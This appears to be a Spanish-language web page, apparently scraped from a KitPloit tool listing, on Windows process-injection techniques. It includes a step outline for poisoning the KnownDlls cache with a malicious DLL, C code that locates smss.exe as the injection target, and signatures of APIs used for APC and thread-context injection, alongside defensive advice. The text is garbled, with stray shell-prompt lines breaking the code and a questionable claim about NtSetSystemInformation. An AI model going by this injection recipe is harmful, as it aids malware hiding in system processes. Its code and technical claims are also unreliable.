APIs clave:
- [`NtSetSystemInformation`](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-ntsetsysteminformation) (sin documentar)  ```c
NTSTATUS NTAPI NtSetSystemInformation(
  SYSTEM_INFORMATION_CLASS SystemInformationClass,
  PVOID                    SystemInformation,
  ULONG                    SystemInformationLength
);

Plantilla:

  1. Crea una DLL maliciosa con el mismo nombre que una entrada legítima de KnownDlls
  2. Crea un objeto Section para la DLL maliciosa:
    • Usa NtCreateSection para crear un objeto de sección
    • Asigna una vista de la sección a memoria
    • Escribe el contenido de la DLL maliciosa en la vista asignada
  3. Usa NtSetSystemInformation con SystemExtendServiceTableInformation para añadir la DLL maliciosa a la caché de KnownDlls
  4. La DLL maliciosa se cargará en lugar de la legítima por los procesos

Detección y Defensa:

  • Implementa comprobaciones de integridad de KnownDlls
  • Supervisa las modificaciones en la caché de KnownDlls
  • Usa soluciones EDR con capacidades para detectar envenenamiento de la caché de KnownDlls
  • Emplea listas blancas y verificación de firma de código para las DLL en la caché de KnownDlls

Consideraciones Adicionales para la Detección y Defensa

  1. Implementa una estrategia sólida de listas blancas de aplicaciones para evitar que se ejecuten ejecutables y DLL no autorizados.
  2. Usa Windows Defender Exploit Guard o tecnologías similares para habilitar reglas de reducción de superficie de ataque (ASR).
  3. Mantén los sistemas y el software actualizados con los últimos parches de seguridad.
  4. Utiliza el Control de Cuentas de Usuario (UAC) y el principio de menor privilegio para limitar el impacto de inyecciones exitosas.
  5. Implementa la segmentación de red para limitar el movimiento lateral en caso de un ataque exitoso.
  6. Usa tecnologías de Autoprotección de Aplicaciones en Tiempo de Ejecución (RASP) para detectar y prevenir intentos de inyección en tiempo real.
  7. Realiza regularmente actividades de caza de amenazas para buscar proactivamente señales de técnicas de inyección.
  8. Implementa y mantén un robusto sistema de Gestión de Información y Eventos de Seguridad (SIEM) para correlacionar y analizar eventos de seguridad.
  9. Lleva a cabo formación periódica en concienciación de seguridad para que los usuarios reconozcan y reporten actividades sospechosas.
  10. Realiza pruebas de penetración y ejercicios de red team de forma regular para identificar vulnerabilidades y mejorar las defensas contra técnicas de inyección.

Enumeración de Procesos```c

#include <stdio.h> #include <Windows.h> #include <tlhelp32.h> #include <errhandlingapi.h> // GetLastError #include <heapapi.h> // HeapCreate, HeapAlloc, HeapDestroy #include <strsafe.h> // StringCchPrintf #include <assert.h> #include <tchar.h>

void ErrorExit(LPCTSTR lpszFunction); int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe); int PrintProcessInfo(const PROCESSENTRY32* lppe);

int PrintProcessInfo(const PROCESSENTRY32* lppe) { assert(lppe);

root@kitploit:~
wprintf(L"PROCESS : %ls\n", lppe->szExeFile);

int PID = static_cast<int>(lppe->th32ProcessID);
if (PID == 0) {
    wprintf(L"ERR : Process Not Found.\n");
    return 0;
}

wprintf(L"PID : %i\n\n", PID);
return 1;

}

void ErrorExit(LPCTSTR functionName) { constexpr DWORD FLAGS = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS; constexpr DWORD LANG_ID = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT); constexpr size_t EXTRA_CHARS = 40;

root@kitploit:~
DWORD errorCode = GetLastError();
LPTSTR messageBuf = nullptr;

FormatMessage(FLAGS, NULL, errorCode, LANG_ID, (LPTSTR)&messageBuf, 0, NULL);

if (messageBuf) {
    size_t funcNameLen = _tcslen(functionName);
    size_t messageLen = _tcslen(messageBuf);
    size_t bufSize = (funcNameLen + messageLen + EXTRA_CHARS) * sizeof(TCHAR);

    LPTSTR displayBuf = static_cast<LPTSTR>(LocalAlloc(LMEM_ZEROINIT, bufSize));
    if (displayBuf) {
        StringCchPrintf(displayBuf, LocalSize(displayBuf) / sizeof(TCHAR), TEXT("%s failed with error %d: %s"), functionName, errorCode, messageBuf);
        MessageBox(NULL, displayBuf, TEXT("Error"), MB_OK);

        LocalFree(displayBuf);
    }

    LocalFree(messageBuf);
}

ExitProcess(errorCode);

}

int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe) { assert(ProcessName && lppe);

root@kitploit:~
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
    ErrorExit(TEXT("CreateToolhelp32Snapshot"));

lppe->dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hSnapshot, lppe) == FALSE) {
    CloseHandle(hSnapshot);
    ErrorExit(TEXT("Process32First"));
}

int pFoundFlag = 0;
do {
    size_t wcProcessName = wcslen(ProcessName);
    if (wcsncmp(lppe->szExeFile, ProcessName, wcProcessName) == 0) {
        if (!PrintProcessInfo(lppe)) continue;
        pFoundFlag = 1;
        break;
    }
} while (Process32Next(hSnapshot, lppe));

CloseHandle(hSnapshot);

return pFoundFlag;

}

int main(int argc, char** argv) { wchar_t pName[] = L"smss.exe"; // process name we will be injecting PROCESSENTRY32 lppe = { 0 };

root@kitploit:~
if (ProcessEnumerateAndSearch(pName, &lppe)) {
    // do some stuff
}
else {
    return 1;
}

return 0;

}

root@kitploit:~
Descargar herramienta
  • NtQueueApcThread (Sin documentar) ```c NTSTATUS NTAPI NtQueueApcThread( IN HANDLE ThreadHandle, IN PIO_APC_ROUTINE ApcRoutine, IN PVOID ApcRoutineContext OPTIONAL, IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, IN ULONG ApcReserved OPTIONAL );
    root@kitploit:~
  • RtlCreateUserThread (ver arriba)
  • KeInitializeAPC (Modo kernel, no documentado) ```c VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
    root@kitploit:~
  • WriteProcessMemory (ver arriba)
  • GetThreadContext ```c BOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );
    root@kitploit:~
  • SetThreadContext (ver arriba)
  • ResumeThread (ver arriba)
  • SetPropA
    root@kitploit:~
  • PostMessage ```c BOOL PostMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~